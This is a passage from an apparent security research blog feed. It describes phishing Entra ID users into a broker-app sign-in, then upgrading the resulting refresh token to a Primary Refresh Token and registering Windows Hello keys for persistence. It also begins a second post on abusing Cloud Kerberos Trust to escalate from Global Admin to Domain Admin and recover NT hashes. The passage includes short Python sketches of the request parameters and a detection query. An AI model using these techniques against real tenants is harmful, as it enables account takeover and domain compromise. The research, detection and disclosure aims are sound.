<p>To obtain a Primary Refresh Token, you need to start with a device identity and then use the user’s credentials to request a PRT. This limits how these powerful tokens can be issued and makes it harder for attackers to obtain them.</p>

<h2 id="the-exception-to-the-rule---special-refresh-tokens">The exception to the rule - special refresh tokens</h2>
<p>A while ago I was researching Windows Hello for Business (WHFB) and I spent quite a bit of time resetting my test systems to analyze the process. During this research I observed some interesting behaviour. If one sets up a new Windows installation, it is usually only necessary to authenticate once during the setup process, and that one authentication is used to complete the entire setup flow and also set up WHFB keys. This is interesting, since at the moment the setup starts, the device is not yet joined or registered in Azure AD. At the end, however, we have a PRT that is used for SSO, and that even meets the requirements to provision WHFB keys (which always requires a device identity used through a PRT).</p>

<p>Through analyzing the token flows used during the Windows setup, I found out that the process starts by signing in to a specific application, which gives Windows an access token and a refresh token. The access token can be used to join the device to Azure AD and set up the device identity. After the device registration, the refresh token, which was issued without a device identity, is used with the new device identity to request a Primary Refresh Token. To me this is quite a clear violation of the token security architecture: we can use a regular refresh token, which is tied to a specific app but not to a device, to first register a device and then request a more powerful token that can be used in any sign-in scenario.</p>

<h1 id="technical-details">Technical details</h1>
<p>The “upgrade” from normal refresh token to primary refresh token is not possible with every refresh token. It requires a specific application ID (client ID) in the sign-in flow. Windows uses the client ID <code class="language-plaintext highlighter-rouge">29d9ed98-a469-4536-ade2-f981bc1d605e</code> (Microsoft Authentication Broker) and resource <code class="language-plaintext highlighter-rouge">https://enrollment.manage.microsoft.com/</code> for this request. We can emulate this flow with the roadtx <code class="language-plaintext highlighter-rouge">gettokens</code> command, which supports several different authentication flows:</p>
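<p>For reference, the token request for this flow boils down to a standard OAuth 2.0 password grant with the broker client ID and enrollment resource named above. A minimal sketch of the request body (the exact parameter set is an assumption; roadtx and Windows send additional fields):</p>

```python
from urllib.parse import urlencode

# Client/resource pair used for the broker sign-in, as described above.
# The full set of fields Windows sends is larger; this sketch only
# mirrors the parameters that matter for the flow.
TOKEN_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/token"
BROKER_CLIENT_ID = "29d9ed98-a469-4536-ade2-f981bc1d605e"  # Microsoft Authentication Broker
ENROLLMENT_RESOURCE = "https://enrollment.manage.microsoft.com/"

def build_token_request(username: str, password: str) -> dict:
    # Resource Owner Password Credentials grant, comparable to what
    # `roadtx gettokens` does when given a username and password
    return {
        "grant_type": "password",
        "client_id": BROKER_CLIENT_ID,
        "resource": ENROLLMENT_RESOURCE,
        "username": username,
        "password": password,
    }

body = urlencode(build_token_request("user@example.com", "Passw0rd!"))
print(body)
```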

<p><img src="/assets/img/devicecode/gettokens-broker.png" alt="Getting a token" class="align-center" /></p>

<p>If there is a policy that requires MFA to sign in, we can instead use the <code class="language-plaintext highlighter-rouge">interactiveauth</code> module:</p>

<p><img src="/assets/img/devicecode/gettokens-interactive.png" alt="Getting a token interactively" class="align-center" /></p>

<p>The resulting refresh token (which is cached in the <code class="language-plaintext highlighter-rouge">.roadtools_auth</code> file) can be used to request a token for the device registration service, where we can create the device:</p>

<p><img src="/assets/img/devicecode/regdevice.png" alt="Creating the device" class="align-center" /></p>

<p>Now that we have a device identity, we can combine this with the same refresh token to obtain a PRT (both refresh tokens shortened for readability):</p>

<p><img src="/assets/img/devicecode/tech-getprt.png" alt="Obtaining a refresh token" class="align-center" /></p>

<p>Tokens resulting from the authentication will contain the same authentication method claims as used during the registration, so any MFA usage will be transferred to the PRT. The PRT that we get can be used in any authentication flow, so we can expand the scope of our limited refresh token to any possible app.</p>

<p><img src="/assets/img/devicecode/prtauth.png" alt="Using the PRT to get a token for Teams" class="align-center" /></p>

<p>We can also use this to sign in to browser flows:</p>

<p><img src="/assets/img/devicecode/prt-browser.png" alt="Using the PRT to sign in to web sites in the browser" class="align-center" /></p>

<h2 id="provisioning-windows-hello-for-business-keys">Provisioning Windows Hello for Business keys</h2>
<p>If you set up Windows and WHFB is enabled for your device, it will use the same session to provision the WHFB key for the newly set up device. To do this, we will need an access token with the <code class="language-plaintext highlighter-rouge">ngcmfa</code> claim. As long as we did the MFA authentication within the last 10 minutes, the PRT from the previous step is all we need. We can ask Azure AD to give us a token for the device registration service that contains this claim, without requiring further user interaction. To do this, we use the <code class="language-plaintext highlighter-rouge">prtenrich</code> command from roadtx, which will ask for this token.</p>
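<p>The freshness requirement can be thought of as a simple claim check: the access token for the device registration service must carry the <code class="language-plaintext highlighter-rouge">ngcmfa</code> method claim, and the underlying MFA must be recent. A sketch of that check, assuming standard <code class="language-plaintext highlighter-rouge">amr</code> and <code class="language-plaintext highlighter-rouge">auth_time</code> claim names and the 10-minute window mentioned above:</p>

```python
import time

NGCMFA_MAX_AGE = 10 * 60  # seconds; WHFB provisioning wants recent MFA

def can_provision_whfb(claims: dict, now=None) -> bool:
    # The token must carry the ngcmfa authentication method reference
    # and the underlying MFA must be at most 10 minutes old
    if "ngcmfa" not in claims.get("amr", []):
        return False
    now = time.time() if now is None else now
    return now - claims.get("auth_time", 0) <= NGCMFA_MAX_AGE

fresh = {"amr": ["pwd", "mfa", "ngcmfa"], "auth_time": 1_700_000_000}
print(can_provision_whfb(fresh, now=1_700_000_300))  # MFA 5 minutes ago -> True
print(can_provision_whfb(fresh, now=1_700_001_000))  # ~17 minutes ago -> False
```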

<p><img src="/assets/img/devicecode/ngcmfa.png" alt="Asking for a token with ngcmfa claim to register WHFB keys" class="align-center" /></p>

<p>With this new access token, we can provision the new WHFB key. This key can be used to also request new PRTs in the future, without needing access to the users password.</p>

<p><img src="/assets/img/devicecode/winhello.png" alt="Provisioning the WHFB key" class="align-center" /></p>

<p><img src="/assets/img/devicecode/helloauth.png" alt="Using the WHFB key" class="align-center" /></p>

<h1 id="phishing-for-primary-refresh-tokens">Phishing for Primary Refresh Tokens</h1>
<p>Now that we know how the process works, we can change the approach to make it usable for phishing. Phishing PRTs directly is not possible, since this requires an existing device identity to be used during the flow. We cannot trick users or their endpoints into sending us the required information to directly request a PRT. We can, however, use several methods to ask for a regular refresh token with the right client and resource, and then use that to register a device and ask for a PRT.</p>

<h2 id="device-code-phishing">Device code phishing</h2>
<p>In the authentication step above, we used a username and password to authenticate. However, we can also use the device code flow for this. While Windows does not use this flow for the registration/join process, it is a valid OAuth flow which will give us the same refresh token.</p>

<p><img src="/assets/img/devicecode/devicecode-broker.png" alt="Device code sign in" class="align-center" /></p>

<p>As you can see, the device code flow asks users to enter a code on their own device and complete the authentication, which will provide the tokens on the device where the flow was initiated. This flow is also suitable for phishing, because if we can convince our victim to perform the authentication with a device code, we will obtain tokens on their behalf. This is not a new technique; it has been described by several people in the past, and there are several toolkits that make the whole process easier. If you want to read up on this technique, here are some references:</p>

<ul>
  <li><a href="https://aadinternals.com/post/phishing/">https://aadinternals.com/post/phishing/</a></li>
  <li><a href="https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html">https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html</a></li>
  <li><a href="https://github.com/secureworks/squarephish">https://github.com/secureworks/squarephish</a></li>
  <li><a href="https://www.blackhillsinfosec.com/dynamic-device-code-phishing/">https://www.blackhillsinfosec.com/dynamic-device-code-phishing/</a></li>
</ul>

<p>So let us assume we convince a user to authenticate, and we receive the refresh token. We can now use this refresh token to:</p>

<ul>
  <li>Register or join a device to Azure AD if we don’t already have access to a device in the tenant.</li>
  <li>Use the refresh token to ask for a PRT.</li>
  <li>If the user performed “fresh” MFA when authenticating with the device code flow, we can also register WHFB credentials on their account for persistence.</li>
</ul>

<p>There are a few caveats to this, which you have to take into account if you are performing this attack:</p>

<ul>
  <li>The device code is only valid for 15 minutes after you initiate the device code flow, which adds extra restrictions if you want to use this for phishing. Some tools account for this by only creating the device code once the user interacts with the email, for example via a QR code.</li>
  <li>Registering or joining devices could be restricted in the tenant to only specific users. In general, joining devices is restricted more often than registering them. Unless there are specific policies that require a certain device status, there won’t be a practical difference in the usability of the token.</li>
  <li>Registering WHFB credentials is only possible if the user actively performed MFA when using the device code. If they use the device code from an existing session on their managed device, the MFA claim will be passed on to the refresh token and is most likely not recent enough to provision a WHFB key. In my testing, the cached sign-in status is only used if the user has an existing session on an unmanaged device; browsers that signed in using SSO will not automatically use the cached login.</li>
</ul>
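<p>The first caveat is purely a timing problem: the device code expires a fixed interval (typically 900 seconds) after issuance, which is why some tools generate it lazily. A sketch of the bookkeeping a phishing tool has to do (no network involved; the 900-second default is an assumption based on the <code class="language-plaintext highlighter-rouge">expires_in</code> field of the OAuth device authorization response):</p>

```python
import time

DEVICE_CODE_LIFETIME = 900  # seconds; `expires_in` from the device authorization response

def code_is_usable(issued_at: float, now=None) -> bool:
    # After expiry, polling the token endpoint returns an expired_token
    # error, so the phishing window closes
    now = time.time() if now is None else now
    return now - issued_at < DEVICE_CODE_LIFETIME

print(code_is_usable(issued_at=0, now=600))   # 10 minutes in -> True
print(code_is_usable(issued_at=0, now=1200))  # 20 minutes in -> False
```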

<p>The video below shows the attack as a proof of concept. In practical scenarios, you could use your preferred device code phishing framework or method to do the phishing part.</p>

<video width="100%" controls="">
    <source src="/assets/raw/prtphish.mp4" type="video/mp4" />
</video>

<p>The video above uses the <a href="https://github.com/kiwids0220/deviceCode2WinHello">deviceCode2WinHello</a> script that automates all these steps, written by <a href="https://twitter.com/mhskai2017">Kai</a> from SpecterOps (see conclusions at the end of the blog). It also uses the <code class="language-plaintext highlighter-rouge">roadtx keepassauth</code> module to do the authentication; in reality you would have to convince your victim to authenticate, but this was easier for the demonstration.</p>

<h2 id="credential-phishing">Credential phishing</h2>
<p>It is also possible to perform the phishing attack using credential phishing methods, for example with evilginx as framework. If we use a Microsoft 365 phishlet to sign in, for example <a href="https://github.com/BakkerJan/evilginx3/blob/main/microsoft365.yaml">this one</a> by Jan Bakker, we will obtain the session cookies for the victim. These session cookies can be used with roadtx to ask for the correct tokens, and from there on the attack is the same:</p>

<p><img src="/assets/img/devicecode/estscookie.png" alt="Signing in with captured cookie" class="align-center" /></p>

<p>I talked more about this approach at AREA41 in June 2024, the slides, recording and a demo video are available on the <a href="/talks/">talks</a> page.</p>

<h1 id="prevention-and-detection">Prevention and detection</h1>
<p>There are not many ways to prevent these attacks. Device code phishing is one of the few methods that is not prevented by requiring a certain MFA strength, since users perform this authentication against the legit Microsoft domains. In addition, there is unfortunately no way to block certain OAuth flows such as the device code flow. The credential phishing approach described above is easier to prevent, since this will happen on a fake website which will prevent some MFA methods from working.</p>

<p>The only real effective way to block this attack is to require a device to be managed via MDM or MAM, by having a Conditional Access policy in place that requires a compliant or hybrid joined device. Complying with this policy would require the newly registered device to also be enrolled in Intune. Provided Intune is locked down sufficiently to block people from enrolling non-corporate or fake devices, our newly registered device won’t be able to become compliant and meet the requirements of these policies. Note that the device registration flow itself is not blocked by policies requiring compliant devices, since this flow is by definition excluded from these policies (you cannot already have a compliant device during device registration). So, if policies are in place that require a compliant or hybrid joined device, it is still possible to obtain a PRT. The PRT can however not be used to authenticate or to enroll the WHFB keys since that would require the device to be compliant or hybrid joined.</p>

<p>Detection of this technique is fortunately easier. Windows will not use the Device Code flow to register or join itself to Azure AD, but it will interactively prompt the user to authenticate. Since the authentication flow is shown in the Sign-in logs, it is quite easy to write detection queries based on the app ID and the authentication flow. An example KQL query would look something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SigninLogs 
| where AppId == "29d9ed98-a469-4536-ade2-f981bc1d605e" //Broker app client id
    and AuthenticationProtocol == "deviceCode"
</code></pre></div></div>

<p>During my discussions with Microsoft on this topic, I was informed that in some cases the device code flow is used legitimately by the broker application, so this query could yield some false positives. If you find some legit matches with this query, feel free to reach out so we can see if it is possible to fine-tune it to exclude legitimate cases.</p>

<h1 id="disclosure-process">Disclosure process</h1>
<p>I reported this issue to Microsoft a few months ago, since the ability to upgrade tokens violates the restrictions that should be in place on refresh tokens. While Microsoft acknowledged the issue, they did not consider this worth fixing immediately because of the requirement to phish users to authenticate. This means that this is something that red teams could use on future engagements until there are new mitigations for this technique, and that defenders should be aware of the abuse potential of these authentication flows.</p>

<p>Microsoft did indicate that they are working on new features to mitigate this issue. The mitigations they are considering are as follows:</p>

<ul>
  <li>Adding additional warnings to the device code flow screen if it is used to authenticate to the broker client, warning the user that this will allow the application to perform Single Sign On on their behalf.</li>
  <li>Adding additional features to Conditional Access that offer more control over when the device code flow is permitted, offering the possibility to restrict or block the device code flow for certain applications or locations, similar to other Conditional Access features.</li>
</ul>

<h1 id="conclusion-and-tools">Conclusion and tools</h1>
<p>Due to the ability to upgrade some refresh tokens to Primary Refresh Tokens, attackers have more ways to phish users and compromise accounts. This uses normal token flows that are already available in tools such as the ROADtools Token eXchange toolkit (roadtx), available via <a href="https://github.com/dirkjanm/ROADtools">GitHub</a>.</p>

<p>While working on this blog, I was having a chat with <a href="https://twitter.com/mhskai2017">Kai</a>, who was one of the people in my Azure AD training a few weeks prior. He also figured out the same upgrade technique independently, and wrote a <a href="https://github.com/kiwids0220/deviceCode2WinHello">script</a> that performs the steps via a single command.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[In Microsoft Entra ID (formerly Azure AD, in this blog referred to as “Azure AD”), there are different types of OAuth tokens. The most powerful token is a Primary Refresh Token, which is linked to a user’s device and can be used to sign in to any Entra ID connected application and web site. In phishing scenarios, especially those that abuse legit OAuth flows such as device code phishing, the resulting tokens are often less powerful tokens that are limited in scope or usage methods. In this blog, I will describe new techniques to phish directly for Primary Refresh Tokens, and in some scenarios also deploy passwordless credentials that comply with even the strictest MFA policies.]]></summary></entry><entry><title type="html">Obtaining Domain Admin from Azure AD by abusing Cloud Kerberos Trust</title><link href="https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/" rel="alternate" type="text/html" title="Obtaining Domain Admin from Azure AD by abusing Cloud Kerberos Trust" /><published>2023-06-13T11:08:57+00:00</published><updated>2023-06-13T11:08:57+00:00</updated><id>https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust</id><content type="html" xml:base="https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/"><![CDATA[<p>Many modern enterprises operate in a hybrid environment, where Active Directory is used together with Azure Active Directory. 
In most cases, identities will be synchronized from the on-premises Active Directory to Azure AD, and the on-premises AD remains authoritative. Because of this integration, it is often possible to move laterally towards Azure AD when the on-premises AD is compromised. Moving laterally from Azure AD to the on-prem AD is less common, as most of the information usually flows from on-premises to the cloud. The Cloud Kerberos Trust model is an exception here, since it creates a trust from the on-premises Active Directory towards Azure AD, and thus it trusts information <em>from</em> Azure AD to perform authentication. In this blog we will look at how this trust can be abused by an attacker that obtains Global Admin in Azure AD, to elevate their privileges to Domain Admin in environments that have the Cloud Kerberos Trust set up. Since this technique is a consequence of the design of this trust type, the blog will also highlight detection and prevention measures admins can implement.</p>

<h1 id="attack-model">Attack model</h1>
<p>Most attacks in hybrid environments consist of moving laterally from Active Directory towards Azure AD, since the source of identities is the on-premises Active Directory, from which the identities are synced to Azure AD. As a result, a compromised Active Directory can almost always result in a compromised Azure AD. I have covered several of these attack paths in the past, in various talks and blogs:</p>

<ul>
  <li>Overwriting Azure AD admin credentials <a href="https://blog.fox-it.com/2019/06/06/syncing-yourself-to-global-administrator-in-azure-active-directory/">via a sync bug</a></li>
  <li>Adding additional credentials to service principals <a href="https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/">via the Azure AD connect sync account</a></li>
  <li>Abusing Seamless Single Sign-on to impersonate identities in the cloud <a href="https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf">via Kerberos</a></li>
</ul>

<p>Attacks from Azure AD to on-prem AD are much rarer, since in many cases AD does not sync much information from Azure AD, and the writeback functions that exist use the permission model of Active Directory to prevent changing information of Tier 0 resources such as Domain Admins. The Cloud Kerberos Trust feature is an exception to this, since it creates a Read Only Domain Controller (RODC) in AD and stores its credentials in Azure AD. This effectively gives Azure AD highly privileged keys that it can use to authenticate most accounts in Active Directory. While we can’t extract these keys from Azure AD, not even with Global Admin, there are some other attack paths that we can abuse to achieve Domain Admin in Active Directory. This attack path assumes the following starting prerequisites:</p>

<ul>
  <li>The attacker has obtained Global Admin privileges in Azure AD.</li>
  <li>The attacker has network connectivity to at least one Domain Controller of the on-premises Active Directory.</li>
  <li>The Cloud Kerberos Trust feature is set up and working properly.</li>
</ul>

<p>The network connectivity requirement means this is not an attack that can be performed from a fully external perspective, but if there is any VPN between Azure hosted resources and an on-premises domain, or a VPN configuration is rolled out via Intune, this should not be too hard to obtain. This is also a valid attack if an attacker is in an Active Directory network and has obtained Global Admin privileges but not yet Domain Admin privileges.</p>

<h1 id="the-cloud-kerberos-trust">The Cloud Kerberos Trust</h1>
<p>Cloud Kerberos Trust was added as a method to enable signing in to Active Directory connected resources with accounts that use a passwordless authentication method. Like the name implies, passwordless methods do not involve a password, so it is not possible for Windows to calculate an NT hash or Kerberos keys for the account. Since Active Directory does not have a native implementation for things such as FIDO2 keys, a trust with Azure AD is established and Azure AD is given a set of keys that it can use to issue Kerberos tickets for Active Directory. The setup is usually performed with a PowerShell script that creates a Read Only Domain Controller (RODC) in AD. This RODC does not really exist as a Windows server in Active Directory, but instead is more like a virtual account that is purely used to establish this trust. The RODC consists of two important components:</p>

<ul>
  <li>The RODC computer account, named <code class="language-plaintext highlighter-rouge">AzureADKerberos$</code>. The presence of this account is also a good indicator that Cloud Kerberos is in use in the domain.</li>
  <li>A secondary <code class="language-plaintext highlighter-rouge">krbtgt</code> account named <code class="language-plaintext highlighter-rouge">krbtgt_AzureAD</code>. This account contains the Kerberos keys used for tickets that Azure AD creates. The SAM account name of this account will include the key ID, for example <code class="language-plaintext highlighter-rouge">krbtgt_9898</code>.</li>
</ul>

<p>The RODC computer account and its secondary krbtgt account are linked together through the <code class="language-plaintext highlighter-rouge">msDS-KrbTgtLinkBl</code> attribute. This is important because an RODC comes with a set of restrictions which are set on the RODC computer account, but also apply to any tickets issued by the secondary krbtgt. As such, while Azure AD could technically issue tickets for users with administrator privileges, such as Domain Admins, these tickets will be refused by the AD domain controllers because the RODC is not allowed to issue tickets for them. This is managed in the attributes <code class="language-plaintext highlighter-rouge">msDS-RevealOnDemandGroup</code> and <code class="language-plaintext highlighter-rouge">msDS-NeverRevealGroup</code>, which are summarized in the GUI as the “Password Replication Policy”:</p>

<p><img src="/assets/img/cloudkerberos/rodcaccount.png" alt="Password Replication allowed and denied group list" class="align-center" /></p>

<p>Since “Domain Users” is in the default allowed scope, any user in the domain can be authenticated from Azure AD, except users in an explicitly denied group. While the denied groups include most default high-privilege groups, in a real domain there will likely be more users with equivalent privileges that are not in any of those groups, so these will be our targets later on.</p>
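<p>For defenders, the presence of the RODC account and its replication policy can be enumerated with a plain LDAP query. A sketch that only prepares the search input, using the account and attribute names described above and a hypothetical base DN (running it requires <code class="language-plaintext highlighter-rouge">ldapsearch</code> or an LDAP library plus bind credentials):</p>

```python
# LDAP search input for spotting Cloud Kerberos Trust in a domain.
# Account and attribute names are the ones described above.
SEARCH_FILTER = "(sAMAccountName=AzureADKerberos$)"
ATTRIBUTES = [
    "msDS-KrbTgtLinkBl",         # link to the secondary krbtgt account
    "msDS-RevealOnDemandGroup",  # principals Azure AD may authenticate
    "msDS-NeverRevealGroup",     # denied (high-privilege) principals
]

def ldapsearch_args(base_dn: str) -> list:
    # Arguments for the OpenLDAP ldapsearch CLI; bind options
    # (-H, -D, -w) still need to be added for a real query
    return ["ldapsearch", "-b", base_dn, SEARCH_FILTER] + ATTRIBUTES

print(" ".join(ldapsearch_args("DC=corp,DC=local")))
```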

<h2 id="how-azure-ad-issues-kerberos-tickets">How Azure AD issues Kerberos tickets</h2>
<p>If a Cloud Kerberos Trust is set up, Azure AD will issue partial Kerberos tickets when a user authenticates on Windows using a hybrid identity. This process occurs at the same time a Primary Refresh Token (PRT) is requested. Windows indicates it wants a TGT with the parameter <code class="language-plaintext highlighter-rouge">tgt=true</code> in the request. The request itself is a signed JWT that contains the user’s credentials or a Windows Hello assertion to authenticate. I’ve talked about the content of this request several times, for example in my <a href="https://dirkjanm.io/assets/raw/TR22_Mollema_Breaking_Azure_AD_joined_endpoints_in_zero-trust_environments_v1.0.pdf">TROOPERS</a> talk from last year, and some more this year at <a href="https://dirkjanm.io/assets/raw/Insomnihack%20Breaking%20and%20fixing%20Azure%20AD%20device%20identity%20security.pdf">Insomnihack</a>. The important part here is the <code class="language-plaintext highlighter-rouge">tgt</code> parameter, which will cause Azure AD to include at least a cloud TGT that can be used for Azure AD Kerberos (mostly relevant when you use Azure AD connected fileshares over SMB), and if configured also a TGT for AD:</p>

<p><img src="/assets/img/cloudkerberos/tgt_req.png" alt="TGT in PRT request" class="align-center" /></p>

<p>The response will have the <code class="language-plaintext highlighter-rouge">tgt_cloud</code> and if configured and applicable to the account we authenticate with also the <code class="language-plaintext highlighter-rouge">tgt_ad</code> parameter:</p>

<p><img src="/assets/img/cloudkerberos/tgt_resp.png" alt="TGT in PRT response" class="align-center" /></p>

<p>The <code class="language-plaintext highlighter-rouge">clientKey</code> parameter is the TGT session key, sent encrypted in JWE (JSON web encryption) format. Windows will first decrypt the session key of the PRT using the transport key of the device. Once it has the PRT session key, it can use that to decrypt the TGT session key. We call this a partial TGT because unlike a regular TGT, this does not include all the information of the user, simply because Azure AD does not have the full list of attributes or groups from the user account. The result is a TGT with a <a href="https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/">PAC</a> that contains only the base attributes such as the user security identifier (SID) and their name. Windows can exchange this partial TGT for a full TGT by requesting a service ticket for the <code class="language-plaintext highlighter-rouge">krbtgt</code> service. The <code class="language-plaintext highlighter-rouge">krbtgt</code> service is normally used during the initial TGT request operation, but it can also be used in this flow to request a full TGT. The request is sent in a TGS-REQ message to a Domain Controller:</p>
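<p>The <code class="language-plaintext highlighter-rouge">clientKey</code> uses the JWE compact serialization, so its protected header (the first of five dot-separated parts) can be inspected without any keys. A sketch with a synthetic JWE built inside the snippet (the header values are illustrative; a real <code class="language-plaintext highlighter-rouge">clientKey</code> is encrypted as described above):</p>

```python
import base64
import json

def jwe_header(jwe: str) -> dict:
    # Compact JWE: header.encrypted_key.iv.ciphertext.tag (five parts)
    parts = jwe.split(".")
    assert len(parts) == 5, "not a compact JWE"
    header = parts[0] + "=" * (-len(parts[0]) % 4)  # restore padding
    return json.loads(base64.urlsafe_b64decode(header))

# Synthetic JWE for demonstration; the header values are illustrative
hdr = base64.urlsafe_b64encode(
    json.dumps({"alg": "dir", "enc": "A256GCM"}).encode()
).rstrip(b"=").decode()
sample = f"{hdr}..iv.ciphertext.tag"  # empty encrypted_key for direct encryption

print(jwe_header(sample)["enc"])  # -> A256GCM
```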

<p><img src="/assets/img/cloudkerberos/tgsreq.png" alt="TGS-REQ exchanging the partial TGT for a full TGT" class="align-center" /></p>

<p>The Domain Controller will reply with a TGS-REP message containing a new TGT, now including a full PAC with all the users attributes and group memberships. This TGT is encrypted with the primary <code class="language-plaintext highlighter-rouge">krbtgt</code> keys of the domain, and can be used to request service tickets for services accepting Kerberos authentication.</p>

<h2 id="ntlm-authentication">NTLM Authentication</h2>
<p>Having a Kerberos TGT still leaves a gap in authentication scenarios. After all, what if the user wants to authenticate to a service that doesn’t support Kerberos and only accepts NTLM authentication? For this, Windows would need the NT hash to calculate the correct challenge/response for authentication. Having an NT hash implies that there is still a password, something we wanted to avoid by going passwordless in the first place. So Microsoft came up with an extension to the Kerberos protocol that allows Windows to obtain the NT hash of a user when exchanging a (partial) TGT signed with a secondary <code class="language-plaintext highlighter-rouge">krbtgt</code> key for a full one signed with the primary <code class="language-plaintext highlighter-rouge">krbtgt</code> key. Note that while this is only possible with tickets signed with secondary <code class="language-plaintext highlighter-rouge">krbtgt</code> keys, this scenario is specifically designed for passwordless authentication, and real RODCs do not use these protocol extensions. The exchange process, including the NT hash recovery, was researched by <a href="https://twitter.com/0xdeaddood">Leandro Cuozzo</a>, who wrote a nice <a href="https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/">technical blog</a> about it and added support for this to the impacket library.</p>

<p>The key in this process is including the <code class="language-plaintext highlighter-rouge">KERB-KEY-LIST-REQ</code> field in the PADATA part of the request. This behaviour is documented in <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/732211ae-4891-40d3-b2b6-85ebd6f5ffff">MS-KILE</a>, which specifies that if this field is encountered, the KDC should include the long-term secrets in the reply. The long-term secret in this case is the NT hash of the user account’s password (I have tried to recover the AES keys this way too, but that does not seem to work). As we can see in the screenshot in the previous section, Windows includes this in the request as PA-DATA type 161. If we look at the response below, we see that the NT hash is included in the encrypted part of the response. Windows can decrypt this using the TGT session key and load the NT hash into memory.</p>
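<p>In the request this is just one extra PA-DATA entry: MS-KILE assigns <code class="language-plaintext highlighter-rouge">KERB-KEY-LIST-REQ</code> padata type 161 (with <code class="language-plaintext highlighter-rouge">KERB-KEY-LIST-REP</code>, type 162, in the reply), and its value lists the requested encryption types, where type 23 (RC4-HMAC) corresponds to the NT hash. A sketch of the constants involved; the actual ASN.1 encoding is handled by impacket:</p>

```python
# Constants from MS-KILE / RFC 4120 relevant to the key list request.
PA_KEY_LIST_REQ = 161  # KERB-KEY-LIST-REQ padata type in the TGS-REQ
PA_KEY_LIST_REP = 162  # KERB-KEY-LIST-REP padata type in the TGS-REP
ETYPE_RC4_HMAC = 23    # rc4-hmac: its long-term key is the NT hash

def key_list_padata() -> dict:
    # Conceptual shape of the padata entry; impacket encodes the
    # actual ASN.1 when building the TGS-REQ
    return {
        "padata-type": PA_KEY_LIST_REQ,
        "padata-value": [ETYPE_RC4_HMAC],  # key types requested from the KDC
    }

print(key_list_padata())
```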

<p><img src="/assets/img/cloudkerberos/tgsrep.png" alt="TGS-REP containing the plain NT hash" class="align-center" /></p>

<h1 id="using-cloud-kerberos-trust-with-roadtx">Using Cloud Kerberos Trust with roadtx</h1>
<p>The process of requesting a PRT for Azure AD or hybrid users has been part of roadtx since its <a href="https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/">release last year</a>. Requesting a PRT will automatically include a request for a TGT, and the resulting TGT will be included in the <code class="language-plaintext highlighter-rouge">.prt</code> file. Roadtx will automatically decrypt the TGT session key as well and include that in the <code class="language-plaintext highlighter-rouge">.prt</code> file so that other tools can use it too. As an example, I’m obtaining a PRT here for a hybrid account. This assumes I have previously registered or joined a device to this Azure AD tenant, which can be done with the <a href="https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-%28roadtx%29#devices">roadtx device module</a>, for which the certificate and key are stored in <code class="language-plaintext highlighter-rouge">talkdevice.pem</code> and <code class="language-plaintext highlighter-rouge">talkdevice.key</code> respectively. Something interesting to note here is that while this mechanism is designed for passwordless authentication methods, Azure AD will also include the TGT if we authenticate with a password. With the password we could just as well request a full TGT directly from Active Directory, but this will become relevant later in this blog.</p>

<p><img src="/assets/img/cloudkerberos/hybridprt.png" alt="PRT for hybrid account" class="align-center" /></p>

<p>Because this is an account that exists in both Active Directory and Azure AD, Azure AD includes the partial TGT with the PRT. This TGT can be extracted from the <code class="language-plaintext highlighter-rouge">.prt</code> file with some utilities in the <a href="https://github.com/dirkjanm/ROADtools_hybrid">roadtools_hybrid</a> repository, which save it to a ccache file. Ccache files are compatible with <a href="https://github.com/fortra/impacket">impacket</a>, so we can use the <code class="language-plaintext highlighter-rouge">getST.py</code> script to upgrade our partial TGT to a full one, as long as we have network connectivity to a Domain Controller.</p>

<p><img src="/assets/img/cloudkerberos/loadticket_upgrade.png" alt="Upgrade the TGT" class="align-center" /></p>

<p>We can use this TGT to authenticate to services connected to Active Directory. We can also recover the NT hash of the user by using a slightly different script. The <code class="language-plaintext highlighter-rouge">partialtofulltgt.py</code> script in the <code class="language-plaintext highlighter-rouge">roadtools_hybrid</code> toolkit combines both steps, taking the partial TGT either directly from the <code class="language-plaintext highlighter-rouge">.prt</code> file or from the ccache file that we saved it to. It will also automatically use the <code class="language-plaintext highlighter-rouge">KERB-KEY-LIST-REQ</code> option to ask the DC nicely to put the NT hash in the response:</p>

<p><img src="/assets/img/cloudkerberos/partialtofulltgt.png" alt="Upgrade the TGT with NT hash recovery" class="align-center" /></p>

<p>In this case the NT hash is not much of a secret, since we already knew the password at the start, but when moving laterally between hybrid identities in Azure AD, having the NT hash could allow us to recover the user’s password, provided it is weak enough for us to crack.</p>

<h1 id="abusing-cloud-kerberos-trust-to-obtain-domain-admin">Abusing Cloud Kerberos Trust to obtain Domain Admin</h1>
<p>To abuse the knowledge from the previous sections, we need to take a closer look at how Azure AD determines for which users it will issue a partial TGT and what information to put in this TGT. The Azure Portal shows the relevant properties of our <code class="language-plaintext highlighter-rouge">hybrid</code> account under the “on-premises” section:</p>

<p><img src="/assets/img/cloudkerberos/on_prem_attributes.png" alt="Attributes of the hybrid account relevant for the on-premises sync" class="align-center" /></p>

<p>Azure AD uses the “On-premises SAM account name” and “On-premises security identifier” attributes to generate the ticket. As a Global Admin, one would assume that we can edit those, and maybe obtain a ticket for any user account in the AD domain, including those that are not synced. Modifying these attributes is not as easy as it sounds though, since both the Microsoft Graph and the Azure AD Graph disallow this, indicating these are read-only attributes. There is a third way to update accounts, which is more flexible in what it allows: the API that Azure AD Connect uses to create and update synced users. Normally, this API is only used by the “On-Premises Directory Synchronization Service Account”, which has the “Directory Synchronization Accounts” role. As a Global Admin, we could create a new sync account and obtain the same privileges. However, we don’t need to do this, since the Global Admin role itself also allows usage of the sync API. I assume this is because the AD Connect account used to be a Global Admin itself, and some environments may still be operating that way. When analyzing how Azure AD Connect updates accounts, we run into this ugly mix of binary and textual data:</p>

